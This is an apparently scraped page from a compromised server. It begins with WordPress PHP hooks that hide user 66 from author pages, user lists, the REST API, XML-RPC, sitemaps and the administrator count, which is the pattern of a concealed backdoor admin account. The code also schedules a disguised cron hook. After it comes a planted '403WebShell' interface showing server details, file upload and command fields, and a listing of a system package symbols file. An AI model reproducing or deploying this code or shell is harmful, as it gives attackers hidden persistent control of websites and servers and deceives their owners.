add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/libxmlb2:arm64.symbols
libxmlb.so.2 libxmlb2 #MINVER#
* Build-Depends-Package: libxmlb-dev
 LIBXMLB_0.1.0@LIBXMLB_0.1.0 0.1.0
 LIBXMLB_0.1.11@LIBXMLB_0.1.11 0.1.11
 LIBXMLB_0.1.12@LIBXMLB_0.1.12 0.1.12
 LIBXMLB_0.1.13@LIBXMLB_0.1.13 0.1.13
 LIBXMLB_0.1.15@LIBXMLB_0.1.15 0.1.15
 LIBXMLB_0.1.1@LIBXMLB_0.1.1 0.1.1
 LIBXMLB_0.1.2@LIBXMLB_0.1.2 0.1.2
 LIBXMLB_0.1.3@LIBXMLB_0.1.3 0.1.3
 LIBXMLB_0.1.4@LIBXMLB_0.1.4 0.1.4
 LIBXMLB_0.1.5@LIBXMLB_0.1.5 0.1.5
 LIBXMLB_0.1.6@LIBXMLB_0.1.6 0.1.6
 LIBXMLB_0.1.7@LIBXMLB_0.1.7 0.1.7
 LIBXMLB_0.2.0@LIBXMLB_0.2.0 0.2.0
 LIBXMLB_0.3.0@LIBXMLB_0.3.0 0.3.2
 LIBXMLB_0.3.19@LIBXMLB_0.3.19 0.3.19
 LIBXMLB_0.3.1@LIBXMLB_0.3.1 0.3.2
 LIBXMLB_0.3.4@LIBXMLB_0.3.4 0.3.4
 xb_builder_add_fixup@LIBXMLB_0.1.3 0.1.3
 xb_builder_add_locale@LIBXMLB_0.1.0 0.1.0
 xb_builder_append_guid@LIBXMLB_0.1.0 0.1.0
 xb_builder_compile@LIBXMLB_0.1.0 0.1.0
 xb_builder_ensure@LIBXMLB_0.1.0 0.1.0
 xb_builder_fixup_get_max_depth@LIBXMLB_0.1.3 0.1.3
 xb_builder_fixup_get_type@LIBXMLB_0.1.3 0.1.3
 xb_builder_fixup_new@LIBXMLB_0.1.3 0.1.3
 xb_builder_fixup_set_max_depth@LIBXMLB_0.1.3 0.1.3
 xb_builder_get_type@LIBXMLB_0.1.0 0.1.0
 xb_builder_import_node@LIBXMLB_0.1.0 0.1.0
 xb_builder_import_source@LIBXMLB_0.1.0 0.1.0
 xb_builder_new@LIBXMLB_0.1.0 0.1.0
 xb_builder_node_add_child@LIBXMLB_0.1.0 0.1.0
 xb_builder_node_add_flag@LIBXMLB_0.1.0 0.1.0
 xb_builder_node_add_token@LIBXMLB_0.3.1 0.3.2
 xb_builder_node_depth@LIBXMLB_0.1.1 0.1.1
 xb_builder_node_export@LIBXMLB_0.1.5 0.1.5
 xb_builder_node_get_attr@LIBXMLB_0.1.0 0.1.0
 xb_builder_node_get_attr_as_uint@LIBXMLB_0.1.3 0.1.3
 xb_builder_node_get_child@LIBXMLB_0.1.1 0.1.1
 xb_builder_node_get_children@LIBXMLB_0.1.0 0.1.0
 xb_builder_node_get_element@LIBXMLB_0.1.0 0.1.0
 xb_builder_node_get_first_child@LIBXMLB_0.1.12 0.1.12
 xb_builder_node_get_last_child@LIBXMLB_0.1.12 0.1.12
 xb_builder_node_get_parent@LIBXMLB_0.1.1 0.1.1
 xb_builder_node_get_tail@LIBXMLB_0.1.12 0.1.12
 xb_builder_node_get_text@LIBXMLB_0.1.0 0.1.0
 xb_builder_node_get_text_as_uint@LIBXMLB_0.1.3 0.1.3
 xb_builder_node_get_tokens@LIBXMLB_0.3.1 0.3.2
 xb_builder_node_get_type@LIBXMLB_0.1.0 0.1.0
 xb_builder_node_has_flag@LIBXMLB_0.1.0 0.1.0
 xb_builder_node_insert@LIBXMLB_0.1.0 0.1.0
 xb_builder_node_insert_text@LIBXMLB_0.1.0 0.1.0
 xb_builder_node_new@LIBXMLB_0.1.0 0.1.0
 xb_builder_node_remove_attr@LIBXMLB_0.1.0 0.1.0
 xb_builder_node_remove_child@LIBXMLB_0.1.1 0.1.1
 xb_builder_node_set_attr@LIBXMLB_0.1.0 0.1.0
 xb_builder_node_set_element@LIBXMLB_0.1.0 0.1.0
 xb_builder_node_set_tail@LIBXMLB_0.1.12 0.1.12
 xb_builder_node_set_text@LIBXMLB_0.1.0 0.1.0
 xb_builder_node_sort_children@LIBXMLB_0.1.3 0.1.3
 xb_builder_node_tokenize_text@LIBXMLB_0.3.1 0.3.2
 xb_builder_node_traverse@LIBXMLB_0.1.1 0.1.1
 xb_builder_node_unlink@LIBXMLB_0.1.1 0.1.1
 xb_builder_set_profile_flags@LIBXMLB_0.1.1 0.1.1
 xb_builder_source_add_adapter@LIBXMLB_0.1.7 0.1.7
 xb_builder_source_add_fixup@LIBXMLB_0.1.3 0.1.3
 xb_builder_source_add_simple_adapter@LIBXMLB_0.1.15 0.1.15
 xb_builder_source_ctx_get_bytes@LIBXMLB_0.1.7 0.1.7
 xb_builder_source_ctx_get_filename@LIBXMLB_0.1.7 0.1.7
 xb_builder_source_ctx_get_stream@LIBXMLB_0.1.7 0.1.7
 xb_builder_source_ctx_get_type@LIBXMLB_0.1.7 0.1.7
 xb_builder_source_get_type@LIBXMLB_0.1.0 0.1.0
 xb_builder_source_load_bytes@LIBXMLB_0.1.2 0.1.2
 xb_builder_source_load_file@LIBXMLB_0.1.1 0.1.1
 xb_builder_source_load_xml@LIBXMLB_0.1.1 0.1.1
 xb_builder_source_new@LIBXMLB_0.1.1 0.1.1
 xb_builder_source_set_info@LIBXMLB_0.1.0 0.1.0
 xb_builder_source_set_prefix@LIBXMLB_0.1.0 0.1.10
 xb_machine_add_method@LIBXMLB_0.1.1 0.1.1
 xb_machine_add_opcode_fixup@LIBXMLB_0.1.1 0.1.1
 xb_machine_add_operator@LIBXMLB_0.1.1 0.1.1
 xb_machine_add_text_handler@LIBXMLB_0.1.1 0.1.1
 xb_machine_get_stack_size@LIBXMLB_0.1.3 0.1.3
 xb_machine_get_type@LIBXMLB_0.1.1 0.1.1
 xb_machine_new@LIBXMLB_0.1.1 0.1.1
 xb_machine_opcode_func_init@LIBXMLB_0.2.0 0.2.0
 xb_machine_parse@LIBXMLB_0.1.1 0.1.1
 xb_machine_parse_full@LIBXMLB_0.1.4 0.1.4
 xb_machine_run@LIBXMLB_0.1.1 0.1.1
 xb_machine_run_with_bindings@LIBXMLB_0.3.0 0.3.2
 xb_machine_set_debug_flags@LIBXMLB_0.1.1 0.1.1
 xb_machine_set_stack_size@LIBXMLB_0.1.3 0.1.3
 xb_machine_stack_pop@LIBXMLB_0.2.0 0.2.0
 xb_machine_stack_push@LIBXMLB_0.2.0 0.2.0
 xb_machine_stack_push_integer@LIBXMLB_0.2.0 0.2.0
 xb_machine_stack_push_text@LIBXMLB_0.2.0 0.2.0
 xb_machine_stack_push_text_static@LIBXMLB_0.2.0 0.2.0
 xb_machine_stack_push_text_steal@LIBXMLB_0.2.0 0.2.0
 xb_node_attr_iter_init@LIBXMLB_0.3.4 0.3.4
 xb_node_attr_iter_next@LIBXMLB_0.3.4 0.3.4
 xb_node_child_iter_init@LIBXMLB_0.3.4 0.3.4
 xb_node_child_iter_loop@LIBXMLB_0.3.4 0.3.4
 xb_node_child_iter_next@LIBXMLB_0.3.4 0.3.4
 xb_node_export@LIBXMLB_0.1.0 0.1.0
 xb_node_get_attr@LIBXMLB_0.1.0 0.1.0
 xb_node_get_attr_as_uint@LIBXMLB_0.1.0 0.1.0
 xb_node_get_child@LIBXMLB_0.1.0 0.1.0
 xb_node_get_children@LIBXMLB_0.1.0 0.1.0
 xb_node_get_data@LIBXMLB_0.1.0 0.1.0
 xb_node_get_depth@LIBXMLB_0.1.0 0.1.0
 xb_node_get_element@LIBXMLB_0.1.0 0.1.0
 xb_node_get_next@LIBXMLB_0.1.0 0.1.0
 xb_node_get_parent@LIBXMLB_0.1.0 0.1.0
 xb_node_get_root@LIBXMLB_0.1.0 0.1.0
 xb_node_get_silo@LIBXMLB_0.2.0 0.2.0
 xb_node_get_tail@LIBXMLB_0.1.12 0.1.12
 xb_node_get_text@LIBXMLB_0.1.0 0.1.0
 xb_node_get_text_as_uint@LIBXMLB_0.1.0 0.1.0
 xb_node_get_type@LIBXMLB_0.1.0 0.1.0
 xb_node_query@LIBXMLB_0.1.0 0.1.0
 xb_node_query_attr@LIBXMLB_0.1.0 0.1.0
 xb_node_query_attr_as_uint@LIBXMLB_0.1.0 0.1.0
 xb_node_query_export@LIBXMLB_0.1.0 0.1.0
 xb_node_query_first@LIBXMLB_0.1.0 0.1.0
 xb_node_query_first_full@LIBXMLB_0.1.11 0.1.11
 xb_node_query_first_with_context@LIBXMLB_0.3.0 0.3.2
 xb_node_query_full@LIBXMLB_0.1.4 0.1.4
 xb_node_query_text@LIBXMLB_0.1.0 0.1.0
 xb_node_query_text_as_uint@LIBXMLB_0.1.0 0.1.0
 xb_node_query_with_context@LIBXMLB_0.3.0 0.3.2
 xb_node_set_data@LIBXMLB_0.1.0 0.1.0
 xb_node_transmogrify@LIBXMLB_0.1.12 0.1.12
 xb_opcode_cmp_str@LIBXMLB_0.1.1 0.3.4
 xb_opcode_cmp_val@LIBXMLB_0.1.1 0.3.4
 xb_opcode_func_init@LIBXMLB_0.2.0 0.3.4
 xb_opcode_get_kind@LIBXMLB_0.1.1 0.3.4
 xb_opcode_get_str@LIBXMLB_0.1.1 0.3.4
 xb_opcode_get_val@LIBXMLB_0.1.1 0.3.4
 xb_opcode_integer_init@LIBXMLB_0.2.0 0.3.4
 xb_opcode_kind_from_string@LIBXMLB_0.1.1 0.1.1
 xb_opcode_kind_to_string@LIBXMLB_0.1.1 0.1.1
 xb_opcode_text_init@LIBXMLB_0.2.0 0.3.4
 xb_opcode_text_init_static@LIBXMLB_0.2.0 0.3.4
 xb_opcode_text_init_steal@LIBXMLB_0.2.0 0.3.4
 xb_opcode_to_string@LIBXMLB_0.1.4 0.3.4
 xb_query_bind_str@LIBXMLB_0.1.4 0.1.4
 xb_query_bind_val@LIBXMLB_0.1.4 0.1.4
 xb_query_context_clear@LIBXMLB_0.3.0 0.3.2
 xb_query_context_copy@LIBXMLB_0.3.0 0.3.2
 xb_query_context_free@LIBXMLB_0.3.0 0.3.2
 xb_query_context_get_bindings@LIBXMLB_0.3.0 0.3.2
 xb_query_context_get_flags@LIBXMLB_0.3.0 0.3.2
 xb_query_context_get_limit@LIBXMLB_0.3.0 0.3.2
 xb_query_context_get_type@LIBXMLB_0.3.0 0.3.2
 xb_query_context_init@LIBXMLB_0.3.0 0.3.2
 xb_query_context_set_flags@LIBXMLB_0.3.0 0.3.2
 xb_query_context_set_limit@LIBXMLB_0.3.0 0.3.2
 xb_query_get_flags@LIBXMLB_0.1.15 0.1.15
 xb_query_get_limit@LIBXMLB_0.1.4 0.1.4
 xb_query_get_type@LIBXMLB_0.1.4 0.1.4
 xb_query_get_xpath@LIBXMLB_0.1.4 0.1.4
 xb_query_new@LIBXMLB_0.1.4 0.1.4
 xb_query_new_full@LIBXMLB_0.1.6 0.1.6
 xb_query_set_flags@LIBXMLB_0.1.15 0.1.15
 xb_query_set_limit@LIBXMLB_0.1.4 0.1.4
 xb_silo_export@LIBXMLB_0.1.0 0.1.0
 xb_silo_export_file@LIBXMLB_0.1.2 0.1.2
 xb_silo_get_bytes@LIBXMLB_0.1.0 0.1.0
 xb_silo_get_enable_node_cache@LIBXMLB_0.2.0 0.2.0
 xb_silo_get_guid@LIBXMLB_0.1.0 0.1.0
 xb_silo_get_profile_string@LIBXMLB_0.1.1 0.1.1
 xb_silo_get_root@LIBXMLB_0.1.0 0.1.0
 xb_silo_get_size@LIBXMLB_0.1.0 0.1.0
 xb_silo_get_type@LIBXMLB_0.1.0 0.1.0
 xb_silo_invalidate@LIBXMLB_0.1.1 0.1.1
 xb_silo_is_valid@LIBXMLB_0.1.0 0.1.0
 xb_silo_load_from_bytes@LIBXMLB_0.1.0 0.1.0
 xb_silo_load_from_file@LIBXMLB_0.1.0 0.1.0
 xb_silo_lookup_query@LIBXMLB_0.3.0 0.3.2
 xb_silo_new@LIBXMLB_0.1.0 0.1.0
 xb_silo_new_from_xml@LIBXMLB_0.1.0 0.1.0
 xb_silo_query@LIBXMLB_0.1.0 0.1.0
 xb_silo_query_build_index@LIBXMLB_0.1.4 0.1.4
 xb_silo_query_first@LIBXMLB_0.1.0 0.1.0
 xb_silo_query_first_full@LIBXMLB_0.1.13 0.1.13
 xb_silo_query_first_with_context@LIBXMLB_0.3.0 0.3.2
 xb_silo_query_full@LIBXMLB_0.1.13 0.1.13
 xb_silo_query_with_context@LIBXMLB_0.3.0 0.3.2
 xb_silo_save_to_file@LIBXMLB_0.1.0 0.1.0
 xb_silo_set_enable_node_cache@LIBXMLB_0.2.0 0.2.0
 xb_silo_set_profile_flags@LIBXMLB_0.1.1 0.1.1
 xb_silo_to_string@LIBXMLB_0.1.0 0.1.0
 xb_silo_watch_file@LIBXMLB_0.1.0 0.1.0
 xb_stack_get_type@LIBXMLB_0.1.4 0.1.4
 xb_stack_pop@LIBXMLB_0.2.0 0.2.0
 xb_stack_push@LIBXMLB_0.2.0 0.2.0
 xb_stack_to_string@LIBXMLB_0.1.4 0.1.4
 xb_string_append_union@LIBXMLB_0.1.2 0.1.2
 xb_string_escape@LIBXMLB_0.1.2 0.1.2
 xb_value_bindings_bind_str@LIBXMLB_0.3.0 0.3.2
 xb_value_bindings_bind_val@LIBXMLB_0.3.0 0.3.2
 xb_value_bindings_clear@LIBXMLB_0.3.0 0.3.2
 xb_value_bindings_copy@LIBXMLB_0.3.0 0.3.2
 xb_value_bindings_copy_binding@LIBXMLB_0.3.0 0.3.2
 xb_value_bindings_free@LIBXMLB_0.3.0 0.3.2
 xb_value_bindings_get_type@LIBXMLB_0.3.0 0.3.2
 xb_value_bindings_init@LIBXMLB_0.3.0 0.3.2
 xb_value_bindings_is_bound@LIBXMLB_0.3.0 0.3.2
 xb_value_bindings_lookup_opcode@LIBXMLB_0.3.0 0.3.2
 xb_version_string@LIBXMLB_0.3.19 0.3.19

Youez - 2016 - github.com/yon3zu
LinuXploit